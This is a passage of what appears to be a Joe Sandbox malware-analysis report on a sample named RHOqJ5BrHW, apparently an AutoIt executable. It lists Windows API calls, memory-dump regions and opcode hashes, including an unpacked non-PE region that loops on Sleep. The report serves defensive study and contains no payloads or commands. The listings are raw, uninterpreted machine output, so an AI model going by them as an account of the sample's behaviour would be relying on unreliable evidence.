                                    • SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00984774
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: cdabce72e9757d78a2807d9f6909d9d094bf6d7f557945b644f548e2166b4f46
                                    • Instruction ID: a8e7fe4a1e5179c286dfee5c98274b586dc9d3049f236d1b8557199c9bbd86b3
                                    • Opcode Fuzzy Hash: cdabce72e9757d78a2807d9f6909d9d094bf6d7f557945b644f548e2166b4f46
                                    • Instruction Fuzzy Hash: CC313C71A0065AAFCB08EF6CD484AADB7B5FF89310F158629E81997700D774BDA0CBD0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: b36805fd3aee2fe21ff73e94e5f4ce187949a24df468892b163488423e2a52ef
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: 5131C574A00105DBDB18DF5CC480A69FBBAFF49340F648AA5E409CB296DB35EDC1CB90
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 9e4a099c55798e3947ae9374227bc315417f9f40d65566bcf1a8e5cef1d5d406
                                    • Instruction ID: 125c1e65b35f5788d37f7c913a68c089ea16670995a4ea4abd35c0e0b3d3ff30
                                    • Opcode Fuzzy Hash: 9e4a099c55798e3947ae9374227bc315417f9f40d65566bcf1a8e5cef1d5d406
                                    • Instruction Fuzzy Hash: 4A412F745087558FDB24DF18C494B2ABBE0BF85308F19895CE99A4B362C376F885CF52
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit
                                    • String ID:
                                    • API String ID: 3074181302-0
                                    • Opcode ID: 36d0f8e4cc6c09e613e28467db0977a0d6935595ce2207e25b7bcfa6acba4105
                                    • Instruction ID: fba40eb8d209960ab6bdb919b010f81499b9d76945704dd6f307c82d311cb9bd
                                    • Opcode Fuzzy Hash: 36d0f8e4cc6c09e613e28467db0977a0d6935595ce2207e25b7bcfa6acba4105
                                    • Instruction Fuzzy Hash: 672151728456449BD712BFA8DC467597661AFC3735F260A40F4704F1E3DBB48D019BE1
                                    APIs
                                      • Part of subcall function 00984214: FreeLibrary.KERNEL32(00000000,?), ref: 00984247
                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009839FE,?,00000001), ref: 009841DB
                                      • Part of subcall function 00984291: FreeLibrary.KERNEL32(00000000), ref: 009842C4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Library$Free$Load
                                    • String ID:
                                    • API String ID: 2391024519-0
                                    • Opcode ID: bf9551f153ae0633d7ff0110748039e5476401376a59987d882185054429ffb9
                                    • Instruction ID: 3d8a005dfbb1beb56e51d64ca91ec7b9feb78af5a32148126faed5ad0ef974f2
                                    • Opcode Fuzzy Hash: bf9551f153ae0633d7ff0110748039e5476401376a59987d882185054429ffb9
                                    • Instruction Fuzzy Hash: BC11A731604207BBDF10FB74DD06FAE77E99F80700F108829F5A6A62C1DA75DA059B61
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 8fa01a77f1fecd34200dd48398997567fcb28dfeff44639c347b8500e2c3a7fe
                                    • Instruction ID: 449b496c2ce9f221b80d7eb6ef931ec0f521251f6b6c14600cfcaf51a3554813
                                    • Opcode Fuzzy Hash: 8fa01a77f1fecd34200dd48398997567fcb28dfeff44639c347b8500e2c3a7fe
                                    • Instruction Fuzzy Hash: 65210770508705CFDB24DF68C454B2ABBE1BF85304F25496CF6AA47261D732E845DF92
                                    APIs
                                    • ___lock_fhandle.LIBCMT ref: 009AAFC0
                                      • Part of subcall function 009A7BDA: __getptd_noexit.LIBCMT ref: 009A7BDA
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit$___lock_fhandle
                                    • String ID:
                                    • API String ID: 1144279405-0
                                    • Opcode ID: 138849420ab40c7002096774c1cca8aed8f63b4012055bd65d43d1c721ca0470
                                    • Instruction ID: 1416ba2676e039ddb6d14690d611fb67a72c1769155897d5850a01f1d286e1e6
                                    • Opcode Fuzzy Hash: 138849420ab40c7002096774c1cca8aed8f63b4012055bd65d43d1c721ca0470
                                    • Instruction Fuzzy Hash: D1118F728096609FD712AFE49C4276E7A60AFC3335F2A4640E5741B2E7C7B98D019BE1
                                    APIs
                                    • ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,00A1DC00,00000000,?,0098464E,00A1DC00,00010000,00000000,00000000,00000000,00000000), ref: 0098C337
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: f75e2413f2d10c64c2b03c12fa49ddeda12419d2ed6237f3725a3f56d46a8c1c
                                    • Instruction ID: 2a3972a12aff185c02c762ed12561185aedbc572a6d165d5f57ad91235f4c803
                                    • Opcode Fuzzy Hash: f75e2413f2d10c64c2b03c12fa49ddeda12419d2ed6237f3725a3f56d46a8c1c
                                    • Instruction Fuzzy Hash: A5114572200B459FD720DE4AC880F6AB7E9AF44754F14C81EE4AA8AB50C7B1E846CB60
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 650b71de3c9a30fbac77a3276d03968b028a674fcee853f14ed520da4f0fcb35
                                    • Instruction ID: 97bb1f5fa7b8990f1fc47fd4411b2118181c940e9a992ef36d002df3215504d9
                                    • Opcode Fuzzy Hash: 650b71de3c9a30fbac77a3276d03968b028a674fcee853f14ed520da4f0fcb35
                                    • Instruction Fuzzy Hash: 6201813150410EEECF04FFA4C892DFEBF78EF61304F008029B566972A5EA309A49CB60
                                    APIs
                                    • __lock_file.LIBCMT ref: 009A2AED
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit__lock_file
                                    • String ID:
                                    • API String ID: 2597487223-0
                                    • Opcode ID: 5342c579f559c8b902ea2505968c60267e2ba4d91a4ef14a7fa65d228be69eff
                                    • Instruction ID: 683f05cd5c4958b11b1b54a2cfa1cbc40e7c01945942c8822ca17bfd8d4ee26a
                                    • Opcode Fuzzy Hash: 5342c579f559c8b902ea2505968c60267e2ba4d91a4ef14a7fa65d228be69eff
                                    • Instruction Fuzzy Hash: 6DF0F631500215EBDF21AFBC8C023DF36A5BF82324F198415F8149B1D1C7788A52DBD1
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,009839FE,?,00000001), ref: 00984286
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 4e5c692c4b78f89f7215f56fd0e2fe4045c172f3efd88fb7d3ea47ef84254f35
                                    • Instruction ID: c35d5cffda6a7858dbc43c1ce9e36baebbe12557c2ac5fd21ab19a3080725534
                                    • Opcode Fuzzy Hash: 4e5c692c4b78f89f7215f56fd0e2fe4045c172f3efd88fb7d3ea47ef84254f35
                                    • Instruction Fuzzy Hash: 6BF03971509702CFCB34AFA4D890816BBE8BF043293248A3EF1E786610C7329850DF50
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009840C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID:
                                    • API String ID: 82841172-0
                                    • Opcode ID: 237e109acf301925538f4d8c62d9de9f7f92f9d3577182ff8f3144af7b9aca69
                                    • Instruction ID: 064ef3e132ab4451a37510ae78d372431e9ed6fb93722687a8e6742aebdf8ff7
                                    • Opcode Fuzzy Hash: 237e109acf301925538f4d8c62d9de9f7f92f9d3577182ff8f3144af7b9aca69
                                    • Instruction Fuzzy Hash: F0E0C2376002285BC711E698CC46FEA77ADDFC87A0F0A01B5F909E7244DE64E9828690
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                    • Instruction ID: 765bf860a026e9e95ff785f2d51db6cee22719dcf7488cbebbf7b57d69588e92
                                    • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                    • Instruction Fuzzy Hash: BFE092B0504B009BD7348A24D801BE373E4EB06305F00085DF29B83242EB627C41C65A
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?), ref: 00CA86F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                    • Instruction ID: 963c04c221674a35bb181db9a51738122f2429eee0232c054f90350f1504ab0b
                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                    • Instruction Fuzzy Hash: E7E08C30915209EBCB50CAA88908AA973A8AB06324F204654F816C3690DA308E08E760
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,009F40EA,00000000,00000000,00000000), ref: 009847A9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: ebaff5b9cbe4bf974975e48c879e175c7a23d6e1a63c69699180d03d1dffb976
                                    • Instruction ID: fbbb3529a9aa0d792ca88b705850036f94f1621a4e664863081f3d4ea94ef87f
                                    • Opcode Fuzzy Hash: ebaff5b9cbe4bf974975e48c879e175c7a23d6e1a63c69699180d03d1dffb976
                                    • Instruction Fuzzy Hash: 89D0C97464020CBFEB00CB90DC46F9A7BBCEB04718F200194F600A62D0D6F2BE818B55
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?), ref: 00CA86C3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                    • Instruction ID: 37709af3206661aaf60b770a365a9cbd8f7c3dc826998b2c98512819efa037e8
                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                    • Instruction Fuzzy Hash: CED0A73090620DEBDB10CFB49D099DF73A8D706325F104754FD15C7280D9319E149750
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 009FB32A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: PathTemp
                                    • String ID:
                                    • API String ID: 2920410445-0
                                    • Opcode ID: 2ac1c800f95c27c0b41ff258d5c3be7ddaf458784afdf1a36a86fa8ca2a32699
                                    • Instruction ID: 3c956bc948e07f349ad868672458464b0721f036d3c497c8006d0a611055bfcd
                                    • Opcode Fuzzy Hash: 2ac1c800f95c27c0b41ff258d5c3be7ddaf458784afdf1a36a86fa8ca2a32699
                                    • Instruction Fuzzy Hash: 1DC04CB150169E9BD752A790CD55AF873689B04B01F0440D16649A11609A745B828B11
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 00CAA109
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction ID: d7bb15004184126d697d526d69b4095913fca4dd087a490fe9e5978dbd118a6b
                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction Fuzzy Hash: 17E0BF7494010EEFDB00DFA4D5496DD7BB4EF04301F1005A1FD05D7680DB309E54CA62
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 00CAA109
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction ID: 81f53b5f598a54513acc03ee3d8238e4e4213af404ffd532120ac4c8d87f5658
                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction Fuzzy Hash: ACE0E67494010EEFDB00DFB4D54969D7BF4EF04301F100161FD01D2280D7309D50CA62
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • NtdllDialogWndProc_W.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 009EF87D
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009EF8DC
                                    • GetWindowLongW.USER32(?,000000F0), ref: 009EF919
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009EF940
                                    • SendMessageW.USER32 ref: 009EF966
                                    • _wcsncpy.LIBCMT ref: 009EF9D2
                                    • GetKeyState.USER32(00000011), ref: 009EF9F3
                                    • GetKeyState.USER32(00000009), ref: 009EFA00
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009EFA16
                                    • GetKeyState.USER32(00000010), ref: 009EFA20
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009EFA4F
                                    • SendMessageW.USER32 ref: 009EFA72
                                    • SendMessageW.USER32(?,00001030,?,009EE059), ref: 009EFB6F
                                    • 6F58CB00.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 009EFB85
                                    • 6F58C2F0.COMCTL32(00000000,000000F8,000000F0), ref: 009EFB96
                                    • SetCapture.USER32(?), ref: 009EFB9F
                                    • ClientToScreen.USER32(?,?), ref: 009EFC03
                                    • 6F58C530.COMCTL32(00000000,?,?), ref: 009EFC0F
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 009EFC29
                                    • ReleaseCapture.USER32 ref: 009EFC34
                                    • GetCursorPos.USER32(?), ref: 009EFC69
                                    • ScreenToClient.USER32(?,?), ref: 009EFC76
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 009EFCD8
                                    • SendMessageW.USER32 ref: 009EFD02
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 009EFD41
                                    • SendMessageW.USER32 ref: 009EFD6C
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 009EFD84
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 009EFD8F
                                    • GetCursorPos.USER32(?), ref: 009EFDB0
                                    • ScreenToClient.USER32(?,?), ref: 009EFDBD
                                    • GetParent.USER32(?), ref: 009EFDD9
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 009EFE3F
                                    • SendMessageW.USER32 ref: 009EFE6F
                                    • ClientToScreen.USER32(?,?), ref: 009EFEC5
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 009EFEF1
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 009EFF19
                                    • SendMessageW.USER32 ref: 009EFF3C
                                    • ClientToScreen.USER32(?,?), ref: 009EFF86
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 009EFFB6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 009F004B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$C530DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                    • String ID: @GUI_DRAGID$F
                                    • API String ID: 769010159-4164748364
                                    • Opcode ID: 84a0720e687878b804e90c2b0c418b8349bc62d5660d99527164a5425d9b77a2
                                    • Instruction ID: 6031c6fcd36b17e975323f190b2ebc256231c0af7e234d5aa7e734052cb4e973
                                    • Opcode Fuzzy Hash: 84a0720e687878b804e90c2b0c418b8349bc62d5660d99527164a5425d9b77a2
